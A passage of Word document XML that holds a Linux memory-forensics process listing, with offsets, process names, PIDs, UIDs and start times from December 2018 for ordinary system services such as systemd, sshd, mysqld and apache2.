          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C2F2A1E"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0xffff900579720000 scsi_eh_1            83              2               0               0      ------------------ 2018-12-21 12:05:00 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0225F444" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="786F95A4"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0xffff900579718000 scsi_tmf_1           84              2               0               0      ------------------ 2018-12-21 12:05:00 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05188808" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BCC9F20"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0xffff900579710000 ipv6_addrconf        89              2               0               0      ------------------ 2018-12-21 12:05:00 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19275EA5" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="240173DB"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0xffff9005796e8000 kstrp                99              2               0               0      ------------------ 2018-12-21 12:05:00 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1666B235" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66C65B51"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0xffff9005796ead80 kworker/0:1H         100             2               0               0      ------------------ 2018-12-21 12:05:00 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCF506A" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62AA2C8F"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0xffff900576f896c0 raid5wq              280             2               0               0      ------------------ 2018-12-21 12:05:03 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384CDAB2" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="357C46A3"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0xffff900576f7db00 jbd2/xvda1-8         330             2               0               0      ------------------ 2018-12-21 12:05:03 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776EBB59" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BAEA923"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0xffff900576f7c440 ext4-rsv-conver      331             2               0               0      ------------------ 2018-12-21 12:05:03 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E16399E" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="769BA051"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lastRenderedPageBreak/>
        <w:t>0xffff900576f796c0 iscsi_eh             395             2               0               0      ------------------ 2018-12-21 12:05:03 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AD5F01" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B624653"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0xffff9005797016c0 ib-comp-wq           408             2               0               0      ------------------ 2018-12-21 12:05:04 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472285E6" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1430C495"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0xffff9005796c16c0 ib_mcast             409             2               0               0      ------------------ 2018-12-21 12:05:04 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1277AEE9" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DF24738"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0xffff9005796c5b00 ib_nl_sa_wq          410             2               0               0      ------------------ 2018-12-21 12:05:04 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147DD8C5" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42A306EF"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0xffff900576f7ad80 lvmetad              414             1               0               0      0x0000000039cf6000 2018-12-21 12:05:04 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF1B2EA" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="034DE5A1"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0xffff9005796e96c0 rdma_cm              415             2               0               0      ------------------ 2018-12-21 12:05:04 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6569A16F" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E6F0D0E"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0xffff90057971ad80 systemd-logind       712             1               0               0      0x000000003b2b6000 2018-12-21 12:05:09 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206304C8" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6554BB6F"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0xffff900576f88000 dbus-daemon          720             1               103             107    0x000000003bcca000 2018-12-21 12:05:09 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BB1DE3" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EA79100"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0xffff900576f8ad80 cron                 733             1               0               0      0x000000003baac000 2018-12-21 12:05:10 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52764DE7" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D729A9E"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0xffff9005796c0000 accounts-daemon      734             1               0               0      0x000000003bb3c000 2018-12-21 12:05:10 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9778DA" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30A295B6"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0xffff9005796ec440 lxcfs                737             1               0               0      0x000000003b00e000 2018-12-21 12:05:10 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1104062F" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="685639C3"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0xffff90057b014440 atd                  749             1               0               0      0x000000003b1a4000 2018-12-21 12:05:10 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626DFB62" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EF2D517"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0xffff90057ae28000 polkitd              771             1               0               0      0x000000003af6e000 2018-12-21 12:05:10 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3051D54A" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54E5B8BC"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0xffff90057ae2ad80 agetty               785             1               0               0      0x000000003bcc2000 2018-12-21 12:05:10 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7046EE" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BECD4EC"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0xffff90057ae2db00 agetty               791             1               0               0      0x0000000039ff8000 2018-12-21 12:05:10 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445E0A80" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17B1264C"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0xffff90057bd196c0 loop0                951             2               0               0      ------------------ 2018-12-21 12:05:15 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C5BBDF" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0216ECCF"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0xffff90057bd18000 loop1                1103            2               0               0      ------------------ 2018-12-21 12:05:18 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC53F04" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44876158"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lastRenderedPageBreak/>
        <w:t>0xffff90057a73c440 systemd-network      2788            1               100             102    0x000000003a536000 2018-12-21 12:10:43 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0F509A" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18AE43E4"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0xffff90057a73db00 systemd-resolve      2804            1               101             103    0x0000000039ea6000 2018-12-21 12:10:43 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4293D6BF" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="706F40EA"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0xffff900579712d80 systemd-timesyn      2818            1               -               62583  0x000000003a75a000 2018-12-21 12:10:43 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA23D12" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="771A4EF6"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0xffff90057a7396c0 systemd-journal      2825            1               0               0      0x0000000004406000 2018-12-21 12:10:43 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370DB3A8" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47541A3E"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0xffff9005445a0000 uuidd                5077            1               106             110    0x0000000039ec8000 2018-12-21 12:11:11 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B1FEE3" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="007FA581"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0xffff90057bd1ad80 systemd-udevd        5160            1               0               0      0x000000003a790000 2018-12-21 12:11:12 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8C0F8C" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BFCE555"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0xffff90057bd1db00 xfsalloc             10374           2               0               0      ------------------ 2018-12-21 12:11:28 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3D59D4" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FF6D2CE"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0xffff90057bd1c440 xfs_mru_cache        10375           2               0               0      ------------------ 2018-12-21 12:11:28 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AC1079" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B0227D6"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0xffff90054466ad80 iscsid               10988           1               0               0      0x0000000036d48000 2018-12-21 12:11:35 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E00F8D4" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CBF3873"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0xffff90054466db00 iscsid               10989           1               0               0      0x0000000039d76000 2018-12-21 12:11:35 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1656B50F" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EE5696B"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0xffff90057d49ad80 networkd-dispat      11199           1               0               0      0x0000000039e26000 2018-12-21 12:11:37 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176CC456" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="220A1F51"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0xffff90057940c440 sshd                 12159           1               0               0      0x000000000472c000 2018-12-21 12:12:06 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B4E073" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79601A0C"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0xffff90054f4cdb00 mysqld               5127            1               111             116    0x000000003af40000 2018-12-21 18:18:37 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30136103" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76D44454"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0xffff90057b4cdb00 apache2              5469            1               0               0      0x00000000044da000 2018-12-21 18:29:25 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727D83A2" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="484E4207"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0xffff9005445a2d80 loop2                6189            2               0               0      ------------------ 2018-12-21 19:10:22 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542FCBFF" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D47D597"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0xffff9005445a16c0 snapd                6219            1               0               0      0x0000000039eb2000 2018-12-21 19:10:23 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B1D013" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47D9F3E5"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0xffff90054da68000 loop3                6349            2               0               0      ------------------ 2018-12-21 19:10:26 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68884BF5" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F6E83B7"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lastRenderedPageBreak/>
        <w:t>0xffff9005797196c0 amazon-ssm-agen      6445            1               0               0      0x0000000039e12000 2018-12-21 19:10:27 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD6D4CA" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DBFD00F"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0xffff9005796edb00 rsyslogd             26254           1               102             106    0x0000000017b26000 2018-12-30 10:44:51 UTC+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAE1A9A" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="00184E50" w:rsidRDefault="001225E9" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
